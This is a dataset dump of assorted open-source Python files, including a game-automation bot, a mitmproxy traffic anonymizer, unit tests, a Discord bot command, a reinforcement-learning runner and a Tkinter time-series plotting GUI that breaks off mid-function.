seq_id
stringlengths
4
11
text
stringlengths
113
2.92M
repo_name
stringlengths
4
125
sub_path
stringlengths
3
214
file_name
stringlengths
3
160
file_ext
stringclasses
18 values
file_size_in_byte
int64
113
2.92M
program_lang
stringclasses
1 value
lang
stringclasses
93 values
doc_type
stringclasses
1 value
stars
int64
0
179k
dataset
stringclasses
3 values
pt
stringclasses
78 values
22011657649
import time from fgo.common import * from fgo.管理室 import 随便选任务 from PIL import ImageGrab from fgo.model import stable_predict import numpy as np def 使用小技能(英灵位=0, 技能位=0): def 决定(): def 取消(): return MoveTo(1110, 185) + click() return MoveTo(875, 429) + click() + Wait(Exact(0.90)) + 取消() init_x = 75 y = 580 x = init_x + 英灵位 * 310 + 90 * 技能位 return MoveTo(x, y) + click() + 决定() def 普攻(slot=0): init_x = 150 delta_x = 257 y = 490 return MoveTo(init_x + delta_x * slot, y) + click() def 宝具(英灵位=0): init_x = 480 delta_x = 230 y = 120 return MoveTo(init_x + delta_x * 英灵位, y) + click() 随机小技能 = [] def attack(要使用小技能=True): ret = Wait(Range(0.1, 0.2)) if 要使用小技能: # ret += MoveTo(0, 0) # random.shuffle(随机小技能) # if not 随机小技能: # 随机小技能.extend([(i, j) for i in range(3) for j in range(3)]) # i, j = 随机小技能.pop() # ret += 使用小技能(i, j) ret += MoveTo(1132, 608) + click() ret += Wait(Exact(1.5)) # 等一下,不然放不了第一个宝具 ret += reduce(Compose, (宝具(i) for i in range(3))) l = [(普攻, i) for i in range(5)] random.shuffle(l) l = map(lambda a: a[0](a[1]), l[:3]) ret += reduce(Compose, l) ret += Wait(Exact(7.5)) return ret def 贪玩(): def 接任务(ctx): fix_dpi(Wait(Exact(5)) + 随便选任务() + Wait(Exact(12))).eval(ctx) def 战斗(ctx): fix_dpi(attack()).eval(ctx) def 直接选牌(ctx): fix_dpi(attack(使用小技能=False)).eval(ctx) def 结束战斗(ctx): 下一步按钮 = (1118, 679) ret = MoveTo(*下一步按钮) + click() ret += Wait(Exact(3.0)) fix_dpi(ret).eval(ctx) def 取消释放界面(ctx): ret = Wait(Range(0.5, 1.0)) ret += MoveTo(1145, 260) ret += Wait(Range(0.2, 0.3)) ret += click() fix_dpi(ret).eval(ctx) def 不是很懂(ctx): Wait(Range(0.5, 1.0)).eval(ctx) cases = { 'not_battle': 接任务, 'battle_ending': 结束战斗, 'release': 取消释放界面, 'battle.perform.all': 战斗, 'battle.perform.select': 直接选牌, 'battle.wait': 不是很懂 } def switch(ctx): kind = stable_predict() cases[kind](ctx) body = Function(switch).eval return Loop(Function(lambda _: True), Function(lambda ctx: body(ctx)))
thautwarm/do-you-like-wan-you-si
fgo/战斗.py
战斗.py
py
2,638
python
en
code
11
github-code
36
43587658067
import json as _json import re as _re from typing import List as _List from mitmproxy.http import HTTPFlow as _HTTPFlow from mitmproxy.io import FlowReader as _FlowReader from mitmproxy.io import FlowWriter as _FlowWriter from mitmproxy.io import tnetstring as _tnetstring from . import utils as _utils # ---------- Constants ---------- __ENTITY_PROPERTY_NAMES = [ 'accesstoken', 'advertisingkey', 'attackingshipxml', 'authenticationtype', 'battleid', 'defendingshipxml', 'devicekey', 'email', 'emailverificationstatus', 'facebooktoken', 'facebooktokenexpirydate', 'gamecentername', 'gamecenterfriendcount', 'googleplayaccesstokenexpirydate', 'refreshtoken', 'steamid', ] __QUERY_PARAM_NAMES = [ 'accesstoken', 'advertisingkey', 'battleid', 'checksum', 'devicekey', 'email', 'facebooktoken', 'gamecentername', 'password', 'refreshtoken', 'steamid', 'ticket', ] __RX_PROPERTIES: _re.Pattern = _re.compile('( (' + '|'.join(__ENTITY_PROPERTY_NAMES) + ')="(.*?)")', _re.IGNORECASE | _re.MULTILINE) # ---------- Functions ---------- def anonymize_flow(flow: _HTTPFlow) -> _HTTPFlow: flow.server_conn.sockname = (None, None) for query_param_name, query_param_value in flow.request.query.items(): if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value: try: int(query_param_value) query_param_value = '0' * len(query_param_value) except: query_param_value = 'x' * len(query_param_value) flow.request.query[query_param_name] = query_param_value request_content = '' if flow.request.content: request_content = flow.request.content.decode('utf-8') try: request_content_dict: dict = _json.loads(request_content) except: request_content_dict: dict = None if request_content_dict: # Request Content is a json dictionary for query_param_name, query_param_value in request_content_dict.items(): if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value: try: int(query_param_value) query_param_value = '0' * len(query_param_value) except: query_param_value = 'x' * len(query_param_value) request_content_dict[query_param_name] = query_param_value request_content = _json.dumps(request_content_dict) else: # Request Content is most likely a query parameter string if '=' in request_content: query_params = request_content.split('&') request_content_dict = {} for query_param in query_params: split_query_param = query_param.split('=') if len(split_query_param) == 2: # Ignore malformed query parameters or strings that aren't query parameters query_param_name, query_param_value = split_query_param if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value: try: int(query_param_value) query_param_value = '0' * len(query_param_value) except: query_param_value = 'x' * len(query_param_value) request_content_dict[query_param_name] = query_param_value request_content = '&'.join('='.join((key, value)) for key, value in request_content_dict.items()) flow.request.content = request_content.encode('utf-8') response_content = '' if flow.response.content: response_content = flow.response.content.decode('utf-8') matches = __RX_PROPERTIES.finditer(response_content) for match in matches: matched_string, property_name, property_value = match.groups() try: int(property_value) property_value = '0' * len(property_value) except: try: _utils.parse_pss_datetime(property_value) property_value = '2016-01-06T00:00:00' except: property_value = 'x' * len(property_value) response_content = response_content.replace(matched_string, f' {property_name}="{property_value}"') flow.response.content = response_content.encode('utf-8') return flow def anynomize_flows(file_path: str) -> _List[_HTTPFlow]: with open(file_path, 'rb') as fp: flow_reader: _FlowReader = _FlowReader(fp) flows = [anonymize_flow(flow) for flow in flow_reader.stream()] return flows def store_flows(file_path: str, flows: _List[_HTTPFlow]) -> None: with open(file_path, 'wb') as fp: flow_writer: _FlowWriter = _FlowWriter(fp) for flow in flows: flow_writer.add(flow)
PSS-Tools-Development/pss-api-parser
src/anonymize.py
anonymize.py
py
5,070
python
en
code
4
github-code
36
36304843373
Import("env") def get_build_flag_value(flag_name): build_flags = env.ParseFlags(env['BUILD_FLAGS']) flags_with_value_list = [build_flag for build_flag in build_flags.get('CPPDEFINES') if type(build_flag) == list] defines = {k: v for (k, v) in flags_with_value_list} return defines.get(flag_name).strip('"') str= "%s_%s_%s" % (get_build_flag_value("PROTOCOL"),env.GetProjectOption("board"),get_build_flag_value("PROTOCOL_VERSION")) env.Replace(PROGNAME=str)
Georgegipa/UKP
scripts/rename_bin_file.py
rename_bin_file.py
py
475
python
en
code
0
github-code
36
33914103336
import os import unittest from unittest import mock from imageops.server import Server from imageops.utils import Utils class ServerCheckTest(unittest.TestCase): """ Unit Test Cases about Server Module """ def setUp(self): file_path = os.path.abspath(os.path.dirname(__file__)) os.environ['HOME'] = os.path.join(file_path, 'home') os.environ['TMP_PATH'] = os.path.join(file_path, 'tmp') os.environ['IMAGE_PATH'] = os.path.join(file_path, 'vmImages') self.test_server = Server('123-456-789') self.input_image = os.path.join(os.getenv('IMAGE_PATH'), 'input_image_test_file.img') self.check_record_path = os.path.join(self.test_server.tmp_path, self.test_server.request_id) self.check_record_file = os.path.join(self.check_record_path, self.test_server.check_record_file) def tearDown(self): if os.path.isfile(self.check_record_file): os.remove(self.check_record_file) if os.path.exists(self.check_record_path): os.rmdir(self.check_record_path) if os.path.exists(self.test_server.tmp_path): os.rmdir(self.test_server.tmp_path) def test_server_init_without_request_id(self): logger_mock = mock.Mock() Server.logger = logger_mock self.assertRaises(ValueError, Server) Server.logger.error.assert_called_with('Lacking request_id.') def test_server_init_without_tmp_env(self): logger_mock = mock.Mock() Server.logger = logger_mock os.environ.pop('TMP_PATH') self.assertRaises(ValueError, Server, 'abc-xyz') Server.logger.error.assert_called_with('No TMP_PATH found in env.') def test_server_init_without_image_env(self): logger_mock = mock.Mock() Server.logger = logger_mock os.environ.pop('IMAGE_PATH') self.assertRaises(ValueError, Server, 'abc-xyz') Server.logger.error.assert_called_with('No IMAGE_PATH found in env.') @mock.patch("imageops.utils.Utils.check_cmd_exec") @mock.patch("imageops.utils.Utils.get_md5_checksum") def test_check_vm_image_without_exception(self, get_md5_checksum, check_cmd_exec): check_cmd_exec.return_value = {"format": "qcow2", "virtual_size": 40.0} get_md5_checksum.return_value = '123' status, msg = self.test_server.check_vm_image(self.input_image) self.assertEqual(0, status) self.assertEqual('Check In Progress', msg) def test_check_vm_image_with_no_input_image(self): self.assertRaises(ValueError, self.test_server.check_vm_image) def test_check_vm_image_with_nonexist_input_image(self): self.assertRaises(ValueError, self.test_server.check_vm_image, 'nonexosts.img') @mock.patch("imageops.utils.Utils.check_cmd_exec") @mock.patch("imageops.utils.Utils.get_md5_checksum") def test_check_vm_image_failed(self, get_md5_checksum, check_cmd_exec): check_cmd_exec.side_effect = Exception get_md5_checksum.return_value = '123' status, msg = self.test_server.check_vm_image(self.input_image) self.assertEqual(1, status) self.assertEqual('Check Failed', msg)
EdgeGallery/toolchain
imageops/imageops/tests/test_server_check.py
test_server_check.py
py
3,281
python
en
code
19
github-code
36
70951081705
import numpy as np import unittest import javabridge as J import imagej.imageplus as I import imagej.imageprocessor as IP class TestImageProcessor(unittest.TestCase): def setUp(self): J.attach() def tearDown(self): J.detach() def test_01_01_get_image(self): from cellprofiler.modules.tests import maybe_download_example_image folder = "ExampleCometAssay" fn = "CometTails.tif" file_name = maybe_download_example_image([folder], fn) imageplus_obj = I.load_imageplus(file_name) pixels = IP.get_image(imageplus_obj.getProcessor()) pass def test_01_02_make_image_processor(self): np.random.seed(102) image = np.random.uniform(size=(30, 50)).astype(np.float32) image_processor = IP.make_image_processor(image) result = IP.get_image(image_processor) self.assertEqual(image.shape[0], result.shape[0]) self.assertEqual(image.shape[1], result.shape[1]) self.assertTrue(np.all(result == image))
AnneCarpenter/python-imagej
tests/test_imageprocessor.py
test_imageprocessor.py
py
1,035
python
en
code
0
github-code
36
21323942849
from turtle import Turtle ALIGNMENT = "center" FONTS = { "default": ("Courier", 15, "normal"), "big": ("Courier", 25, "normal"), } class Scoreboard(Turtle): def __init__(self): super().__init__(visible=False) self.score = 0 self.high_score = open("data.txt").read() self.color("white") self.penup() self.color("#DCDCDC") self.update_scoreboard() def update_scoreboard(self): self.clear() self.goto(0, 265) self.write(f"Score: {self.score}", False, ALIGNMENT, FONTS["default"]) self.goto(0, 240) self.write(f"High Score: {self.high_score}", False, ALIGNMENT, FONTS["default"]) def restart(self): if self.score > int(self.high_score): with open("data.txt", mode="w") as high_score: high_score.write(str(self.score)) self.high_score = open("data.txt").read() self.score = 0 self.update_scoreboard() def game_over(self): self.goto(0, 0) self.write("GAME OVER", False, ALIGNMENT, FONTS["big"]) self.goto(0, -30) self.write("Press 'A' to retry.", False, ALIGNMENT, FONTS["default"]) def increase_score(self): self.score += 1 self.update_scoreboard()
happy09123/Snake-Game
scoreboard.py
scoreboard.py
py
1,290
python
en
code
0
github-code
36
15640198972
from django.conf.urls import url,include from django.contrib import admin from django.conf import settings from django.conf.urls.static import static from . import views urlpatterns = [ url(r"^$", views.HomePage.as_view(), name="home"), url(r"^index/$", views.TestPage.as_view(), name="test"), url(r"^thanks/$", views.ThanksPage.as_view(), name="thanks"), url(r'^admin/', admin.site.urls, name='admin'), url(r"^accounts/", include("accounts.urls", namespace="accounts")), url(r"^accounts/", include("django.contrib.auth.urls")), url(r"^groups/",include("groups.urls", namespace="groups")), url(r'^company/', include('company.urls',namespace='company')), url(r'^project/', include('project.urls',namespace='project')), url(r'^sprint/', include('sprint.urls',namespace='sprint')), url(r'^task/', include('task.urls',namespace='task')), url(r'^log/', include('log.urls',namespace='log')), url(r'^todo/', include('todo.urls',namespace='todo')), url(r'^meeting/', include('meeting.urls',namespace='meeting')), ]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
itzikorfa/SE-Lite-Scrum
SE_Project_VerX/urls.py
urls.py
py
1,153
python
en
code
0
github-code
36
72545214823
import hashlib class Codec: def __init__(self): self.url_list=[] self.hash_map={} self.current_id=0 self.alphabet='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(self, longUrl): shortUrl = 'http://tinyurl.com/' m = hashlib.md5(longUrl) m = m.hexdigest() if self.hash_map.has_key(m): url_id = self.hash_map[m] else: self.url_list.append(longUrl) url_id = self.current_id self.hash_map[m] = url_id self.current_id += 1 for i in range(5): p = url_id%62 url_id = url_id/62 shortUrl = shortUrl + str(self.alphabet[p]) return shortUrl def decode(self, shortUrl): idUrl = shortUrl[19:] url_id = 0 weight = 1 for i in idUrl: p = self.alphabet.find(i) url_id += p * weight weight *= 62 return self.url_list[url_id]
zhongchong/Leetcode
Leetcode/535.py
535.py
py
1,052
python
en
code
0
github-code
36
8161754177
import multiprocessing import time def pro1(q): # q에 데이터를 넣는다 for i in range(100): q.put(str(i)) time.sleep(0.1) def pro2(q): # q에 데이터를 빼낸다 for i in range(100): item = q.get() print(item) # JoinableQueue q.task_done() if __name__ == '__main__': queue = multiprocessing.JoinableQueue() p1 = multiprocessing.Process(target=pro1, args=(queue,)) p2 = multiprocessing.Process(target=pro2, args=(queue,)) p1.start() p2.start()
weatherbetter/levelup-python
multi_process/multiprocess_JoinableQueue.py
multiprocess_JoinableQueue.py
py
540
python
en
code
0
github-code
36
29648508373
#! /usr/bin/env python3 # Author: Mohit Saini (mohitsaini1196@gmail.com) """ The entry point of DepG library. Read the `README.md` for more details. """ # pylint: disable=missing-function-docstring # pylint: disable=invalid-name # pylint: disable=missing-class-docstring import os from . import target_graph_builder from .default_configs import getDefaultConfigs from . import merge_build_file from . import parser from . import common def getHeaderPrefixesMap(third_p_build_files): """ A map from header prefix to target. It's used for detecting the dependency target. eg: if a program includes the header "glog/logging.h", it means we can can say this program depends on the glog target. In this case the prefix "glog/" is present in header prefix map with glog-target as corrosponding value. Currently we populate the header prefix map for third-party libraries. Note: All the third-party targets are manually declared. """ output = {} for build_file in third_p_build_files: directory = os.path.dirname(build_file) or "." targets_map = parser.readBuildFile(build_file, directory) for tname, target in targets_map.items(): for i in target.get("header_prefix", []): output[i] = f"{directory}/{tname}" return output def validateWorkingDirectory(source_directory): assert source_directory == os.getcwd(), \ "Current directory should be source_directory." def preprocessConfig(configs): configs.CPP_EXTENSIONS = configs.CPP_HEADER_EXTENSIONS + configs.CPP_SOURCE_EXTENSIONS if configs.HEADER_PREFIXES_MAP is None: configs.HEADER_PREFIXES_MAP = getHeaderPrefixesMap(configs.THIRD_PARTY_TARGET_BUILD_FILES) configs.DEPG_DEPS_CACHE_CHECKSUM = ":".join(common.getFileCheckSum(x) for x in configs.THIRD_PARTY_TARGET_BUILD_FILES) top_dirs = set(common.toRelativePaths(configs.TOP_DIRECTORY_LIST)) configs.IGNORED_PATHS |= set(i for i in os.listdir(".") if i not in top_dirs) return configs class Depg: def __init__(self, source_directory, configs): validateWorkingDirectory(source_directory) self.configs = preprocessConfig(configs) self.deps_parser = target_graph_builder.TargetGraphBuilder(self.configs) def autoGenBuildFileMap(self, paths): target_names = target_graph_builder.changedPathsToTargetNames( paths, self.configs) targets_map = self.deps_parser.getDeps(target_names) build_files_map = merge_build_file.depgTargetsToLocalTargets(targets_map) return build_files_map def regenerateBuildFiles(self, paths, output_directory="."): build_files_map = self.autoGenBuildFileMap(paths) merge_build_file.regenerateBuildFiles(build_files_map, output_directory=output_directory, force_override_build_files=self.configs.force_override_build_files)
mohitmv/depg
depg_lib_main.py
depg_lib_main.py
py
2,978
python
en
code
0
github-code
36
19279680101
import datetime import os import tensorflow as tf import numpy as np class Runner(object): def __init__(self, agent, env, train, load_path): self.agent = agent self.env = env self.train = train # True: entrenar agente, False: se carga agente entrenado self.episode = 1 self.last_10_ep_rewards = [] self.path = './graphs/' + datetime.datetime.now().strftime("%y%m%d_%H%M") \ + ('_train_' if self.train else 'run_') \ + type(agent).__name__ self.writer = tf.summary.create_file_writer(self.path) # Se carga modelo entrenado if not self.train and load_path is not None and os.path.isdir(load_path): self.agent.load_model(load_path) def summarize(self): """Guarda los valores obtenidos por episodio.""" '''self.writer.add_summary(tf.Summary( value=[tf.Summary.Value(tag='Score per Episode', simple_value=self.score)]), self.episode ) if self.train and self.episode % 10 == 0: self.agent.save_model(self.path) try: self.agent.update_target_model() # No se que hace except AttributeError: ... ''' self.episode += 1 def run(self, episodes): """Entrenamiento del agente en la cantidad de episodios dados.""" while self.episode <= episodes: obs = self.env.reset() dist = 0 new_dist = 0 self.score = 0 done = False act = 0 while act < 150: if obs.last(): break state, pos_marine, dist = self.agent.state_marine(obs) if obs.first(): action = self.agent._SELECT_ARMY act_value = 0 else: act_value, action = self.agent.step(state, pos_marine) obs = self.env.step(action) next_state, pos_marine, new_dist = self.agent.state_marine(obs) reward = obs.reward done = reward > 0 reward += dist - new_dist self.score += reward # Guarda las experiencias del agente en cada paso de tiempo. self.agent.buffer.add(state, act_value, reward, next_state, done) state = next_state self.agent.cur_frame += 1 # Copia los pesos de la red principal hacia la red target. if self.agent.cur_frame % self.agent.update_target == 0: self.agent.copy_weights(self.agent.main_nn, self.agent.target_nn) # Entrenamiento de la red neuronal. if len(self.agent.buffer) > self.agent.batch_size: states, actions, rewards, next_states, dones = self.agent.buffer.sample(self.agent.batch_size) loss = self.agent.train_step(states, actions, rewards, next_states, dones) act += 1 # Decrecimiento del epsilon. if self.episode < self.agent.num_episodes: self.agent.decrease_epsilon() # Guarda recompensas de los ultimos 10 episodios. if len(self.last_10_ep_rewards) == 10: self.last_10_ep_rewards = self.last_10_ep_rewards[1:] self.last_10_ep_rewards.append(self.score) # Guarda recompensa y explota el conocimiento del agente cada 10 episodios. if self.episode % 10 == 0: #aux_reward = agent.explotation(iteraciones) mean_rewards = np.mean(self.last_10_ep_rewards) print(f'Episode {self.episode}/{self.agent.num_episodes}, Epsilon: {self.agent.epsilon:.3f}, '\ f'Reward in last 100 episodes: {mean_rewards:.2f}') #episodes.append(episode) #eps_history.append(agent.epsilon) #prom_rewards_greedy.append(aux_reward) #last_100_mean_rewards.append(mean_rewards) self.summarize()
ericPrimelles/RLProject
runner.py
runner.py
py
4,209
python
en
code
0
github-code
36
38799425699
import discord import bdg import enum import requests import bs4 import datetime class BrawlModes(enum.Enum): BRAWLBALL = "brawlBall" SOLOSHOWDOWN = "soloShowdown" DUOSHOWDOWN = "duoShowdown" GEMGRAB = "gemGrab" BOUNTY = "bounty" HOTZONE = "hotZone" KNOCKOUT = "knockout" HEIST = "heist" SIEGE = "siege" names = { BrawlModes.BRAWLBALL: "FUTE-BRAWL", BrawlModes.SOLOSHOWDOWN: "COMBATE SOLO", BrawlModes.DUOSHOWDOWN: "COMBATE DUPLO", BrawlModes.GEMGRAB: "PIQUE-GEMA", BrawlModes.BOUNTY: "CAÇA ESTRELAS", BrawlModes.HOTZONE: "ZONA ESTRATÉGICA", BrawlModes.KNOCKOUT: "NOCAUTE", BrawlModes.HEIST: "ROUBO", BrawlModes.SIEGE: "ENCURRALADO" } colors = { BrawlModes.BRAWLBALL: 0x8CA0DF, BrawlModes.SOLOSHOWDOWN: 0x81D621, BrawlModes.DUOSHOWDOWN: 0x81D621, BrawlModes.GEMGRAB: 0x9B3DF3, BrawlModes.BOUNTY: 0x01CFFF, BrawlModes.HOTZONE: 0xE33C50, BrawlModes.KNOCKOUT: 0xF7831C, BrawlModes.HEIST: 0xD65CD3, BrawlModes.SIEGE: 0xF04F32 } class BrawlMetasCommand(discord.app_commands.Command): def __init__(self, bot: bdg.BotDusGuri): self.bot = bot super().__init__( name="brawl_meta", description="Mostra uma lista dos brawlers meta de cada modo de jogo", callback=self.on_command ) async def on_command(self, i: discord.Interaction, modo: BrawlModes, top: int = 10): await i.response.defer(thinking=True) data = self.get_metas(modo, top) desc = str() for brawler in data['brawlers']: desc += "{rank}. **{name}** - `{star}%`\n".format(**brawler) embed = discord.Embed( title=f"Top {top} - {names[modo]}", color=colors[modo], description=desc ) # Definindo o autor como o Brawl Ace embed.set_author( name="Brawl Ace", url="https://brawlace.com/meta", icon_url="https://brawlace.com/assets/images/icon.png?v=22.87" ) # Pegando o ícone do modo de jogo e definindo-o como a thumbnail embed.set_thumbnail(url=data['icon']) # Definindo legenda embed.set_footer(text="(%) Porcentagem de Craque") # definindo como timestamp como tempo da ultima atualização embed.timestamp = data['last_update'] await i.followup.send(embed=embed) def get_metas(self, mode: BrawlModes, count: int = 10) -> dict[str, any]: html = bs4.BeautifulSoup(requests.get("https://brawlace.com/meta", cookies={"lang": "pt"}).content, "html.parser") div = html.select_one(f"#gameModeData{mode.value}") data = {} # Pegando icone do modo de jogo data['icon'] = div.select_one("h3 img")['src'] # Pegando o tempo da ultima atualização last_update = html.select_one("div.input-group option", selected=True).text last_update = datetime.datetime.strptime(last_update, "%Y-%m-%d %H:%M:%S") last_update -= datetime.timedelta(hours=7) # Convertendo de UTC+7 para UTC+0 data['last_update'] = last_update # Definindo brawlers data['brawlers'] = [] brawlers = div.select_one(f"table tbody").find_all("tr") count = sorted((3, count, len(brawlers)))[1] # Mesma coisa que .clamp() for i in range(count): info = {} brawler = brawlers[i].find_all('td') info['rank'] = i + 1 info['name'] = brawler[1].text info['star'] = float(brawler[3].text[0:-2]) # Formatando de '3.33 %' para 3.33 data['brawlers'].append(info) return data
DanielKMach/BotDusGuri
src/commands/utilities/brawlmeta.py
brawlmeta.py
py
3,277
python
en
code
1
github-code
36
417814461
import os from collections import defaultdict def file_statistics(parent_dir): files_dict = defaultdict(list) for root, dirs, files in os.walk(parent_dir): for file in files: stat = os.stat(os.path.join(root, file)) if stat.st_size <= 100: files_dict[100].append(file) elif stat.st_size <= 1000: files_dict[1000].append(file) elif stat.st_size <= 10000: files_dict[10000].append(file) else: files_dict[100000].append(file) result = {} for key, val in sorted(files_dict.items()): result[key] = len(val) return result if __name__ == '__main__': print(file_statistics('some_data'))
Shorokhov-A/practical_tasks
Shorokhov_Andreiy_dz_7/task_7_4.py
task_7_4.py
py
747
python
en
code
0
github-code
36
16895923091
from tkinter import Tk,Button,Label,Frame,Canvas,Entry,Text,StringVar, ttk, filedialog, messagebox import pandas as pd from pandas import datetime, read_csv import numpy as np import matplotlib as mp from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk from matplotlib.figure import Figure import seaborn as sb from statsmodels.tsa.arima_model import ARIMA from sklearn.metrics import mean_squared_error from PIL import ImageTk, Image root = Tk class TimeSeriesAnalysis(Tk): """ Class to manage frames and methods """ def __init__(self, *main): Tk.__init__(self, *main) container = Frame(self) container.pack(side="top", expand=True) container.grid_rowconfigure(0, weight=1) ### allows for frames to expand container.grid_columnconfigure(0, weight=1) self.fileAddress = "" ## creates the variable which will be used fo the main functions to plot/forecast self.frames = {} #### creates dictionary to store alll frames which willl be used pages = (MainMenu, Op1, Op2, Op3, Op4, FileSelection) ### list with all frames for i in (pages): ##for loop to allow all pages to inherit methods from main class frame = i(container, self) self.frames[i] = frame #### allows frames to inherit characteristics of the main class and hence use its methods frame.grid(row=0, column=0, sticky="nsew") # frame.grid_rowconfigure(0,minsize=8,weight=1) frame.grid_columnconfigure(0,minsize=8,weight=1) frame.grid_propagate(False) def show_frame(self, y): frame = self.frames[y] frame.tkraise() def ignore(event): pass ###def savefig(SaveFileAddress): #self.SaveFileAddress = filedialog.asksaveasfilename(initialdir = "/",title = "Select file",filetypes = (("jpeg files","*.jpg"),("all files","*.*"))) class MainMenu(Frame): """ Frame which operated as main menu which allows user to pick options and change file selection """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Time Series Analysis") label.pack() im = Image.open("C:/Users/Fernando/Documents/NEA/logo.jpg") ## imports logo canvas = Canvas(self,width=50,height=50) canvas.pack() canvas.image = ImageTk.PhotoImage(im) ## uses tkinte library in order to display image on canvas canvas.create_image(25,25,image=canvas.image,anchor="center") ## creates a canvas for which the image wiill be displayed on self.option1button = Button(self,text="Plot time series",command=lambda: ## Button to direct user to frame OP1 controller.show_frame(Op1)) self.option1button.pack() self.option2button =Button(self,text="Plot time series using rolling mean",command=lambda: ## Button t direct user to frame OP2 controller.show_frame(Op2)) self.option2button.pack() self.option3button = Button(self,text="Plot time series using first order differencing",command=lambda: ## Button t direct user to frame OP3 controller.show_frame(Op3)) self.option3button.pack() self.option4button = Button(self,text="Analyse time series using arima model",command=lambda: ## Button t direct user to frame OP4 controller.show_frame(Op4)) self.option4button.pack() self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: ## Button t direct user to frame FileSelection controller.show_frame(FileSelection)) self.ChangeFile.pack() self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack() class FileSelection(Frame): """ Frame which allows user to pick and change file selected """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="File Entry") label.pack(pady=10,padx=10) TempFileA = StringVar() def OpenBrowser(event): self.EnterButton.tk_focusNext().focus() ## changes focus of tkinter in order to prevent from going into a recursive loop with no end casae TempFileA.set(filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("CSV Files","*.csv"),("all files","*.*")))) ####Opens File browser at computer home directory in order to allow user to select file return("break") ##Returns break in order to ensure that focus is changed def GetVarChangeF(): controller.fileAddress = TempFileA.get() ##Gets the value stored in the entry widget which is labeled # TempFileA if len(controller.fileAddress)>1 and controller.fileAddress.endswith("csv"): ##### Allows users to move on when they have entered a valid file address for a file with a .csv extension controller.show_frame(MainMenu) else: controller.fileAddress = "" messagebox.showinfo("Time Series Analysis", "Please enter a valid file address") self.FileEntry = Entry(self,textvariable=TempFileA) ## Create a entry which is used as a storage for the fileAddress so it can be passed to controller later on and used to plot/forecast self.FileEntry.pack(anchor="center") self.FileEntry.bind("<FocusIn>",OpenBrowser) ### Binds when focus is put onnto the fille entry widget to OpenBrowser function self.FileEntry.bind("<FocusOut>",controller.ignore()) ### Ignores focus out event self.EnterButton = Button(self,text="Enter",command = lambda: GetVarChangeF()) ## runs GetVarChangeF functionn self.EnterButton.pack(anchor="center") class Op1(Frame): """ Frame which allows user to plot the standard graph """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="Plotting a time series") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') ### Adds plot area label lf.pack() headers = ['date','values'] ### Created a list of the name of the headers which will serve as the axis labels dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) f = Figure(figsize=(5,5),dpi = 100) ### defines a figure in which to embed the graph ax1 = f.add_subplot(111) ### adds a subplot dt.plot(legend = True,ax=ax1) ### plots graph PlotCanvas = FigureCanvasTkAgg(f, self) toolbar = NavigationToolbar2Tk(PlotCanvas,self) PlotCanvas.get_tk_widget().pack(anchor="n",expand = True) PlotCanvas.draw() PlotCanvas._tkcanvas.pack(anchor="n") if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: PlotCanvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op2(Frame): """ Frame which allows user to plot the graph using rolling mean """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Plotting time series with rolling mean") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') ### Adds plot area label lf.pack() headers = ['date','values'] ### Created a list of the name of the headers which will serve as the axis labels dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) f = Figure(figsize=(5,5),dpi = 100) ### defines a figure in which to embed the graph ax1 = f.add_subplot(111) ### adds a subplot dt.rolling(12).mean().plot(legend = True,ax=ax1) ## Plot the data using rolling mean method canvas = FigureCanvasTkAgg(f, self) ## Defines a canvas which can have a matploblib plot on it canvas.draw() ##Makes the canvas canvas.get_tk_widget().pack(anchor="center",expand = True) ### Adds the canvas to the frame toolbar = NavigationToolbar2Tk(canvas,self) ## Defines toolbar to be used canvas._tkcanvas.pack(anchor="center",expand = True) self.GraphDrawn == True if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: canvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op3(Frame): """ Frame which allows user to plot the graph of their data using first orderr differencinng """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Plot time series using first order differencing") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') lf.pack() headers = ['date','values'] 